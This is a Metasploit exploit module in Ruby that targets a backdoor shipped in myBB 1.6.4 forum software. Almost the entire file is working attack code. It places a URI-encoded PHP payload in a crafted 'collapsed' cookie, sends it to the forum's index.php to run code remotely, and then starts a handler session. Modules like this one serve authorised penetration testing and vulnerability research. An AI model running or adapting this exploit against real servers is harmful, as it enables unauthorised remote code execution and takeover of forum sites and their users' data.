## # $Id: mybb_backdoor.rb 13850 2011-10-10 15:40:59Z hdm $ ##  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##  require 'msf/core'  class Metasploit3 < Msf::Exploit::Remote	 Rank = NormalRanking	  include Msf::Exploit::Remote::HttpClient	  def initialize(info = {})		 super(update_info(info,			 'Name'		 => 'myBB 1.6.4 Backdoor Exploit',			 'Description'    => %q{				 myBB is a popular open source PHP forum software. Version 1.6.4 contained an				  unauthorized backdoor, distributed as part of the vendor's source package.			 },			 'Author'	    =>				 [					 'tdz',				 ],			 'License'	   => MSF_LICENSE,			 'Version'	   => '$Revision: 13850 $',			 'References'	=>				 [					 [ 'BID', '49993' ],					 [ 'SECUNIA', '46300' ],					 [ 'URL', 'http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/' ],					 [ 'URL', 'http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt' ]				 ],			 'Privileged'	=> false,			 'Platform'	  => ['php'],			 'Arch'		 => ARCH_PHP,			 'Payload'	   =>				 {					 'Space'	  => 4000,					 'DisableNops' => true,					 'Keys'	   => ['php'],				 },			 'Targets'	   => [ ['Automatic', { }], ],			 'DefaultTarget'  => 0,			 'DisclosureDate' => 'Oct 06 2011'		 ))		  register_options(			 [				 OptString.new('URI', [ true, "myBB path", '/index.php']),			 ], self.class)	 end	   def uri		 datastore['URI']	 end	  def check		 print_status("Checking target")		 res = send_request_raw({			 'method' => 'GET',			 'uri' => uri			 }, 10		 )		  if (not res) or (not res.code.between?(200,299))			 return Exploit::CheckCode::Safe		 else			 return Exploit::CheckCode::Detected		 end	 end	  def exploit		 print_status("Sending exploit request")		  # for details of the backdoor mechanism.		  cookie = "collapsed=0|1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|"		 cookie << Rex::Text.uri_encode(payload.encoded)		  response = send_request_raw({			 'method'  => 'GET',			 'global' => true,			 'uri' => uri,			 'headers' => { 'Cookie' => cookie }		 },10)		  if (not response) or (not response.code.between?(200,299))			 print_error "Cannot connect to #{uri} on #{datastore['RHOST']}, got #{response ? response.code : 'no response'}."		 else			 handler		 end	 end end